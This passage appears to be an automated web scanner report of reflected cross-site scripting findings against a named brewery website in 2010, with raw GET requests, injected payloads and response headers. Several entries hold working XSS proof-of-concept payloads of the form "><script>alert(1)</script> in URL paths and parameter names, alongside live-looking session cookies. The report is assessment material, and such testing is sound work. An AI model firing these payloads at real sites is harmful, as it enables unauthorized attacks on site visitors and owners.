Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806cc"><a>6e5127e8258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company806cc"><a>6e5127e8258/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ab6"><a>2f1540286bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companyd1ab6"><a>2f1540286bf/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><a>c8816d8ff3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companye706a"><a>c8816d8ff3f/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8fc"><a>5627c06183b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company5c8fc"><a>5627c06183b/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca1b"><a>883628057d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company7ca1b"><a>883628057d0/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
1.183. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ninkasibrewing.com
Path: /contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>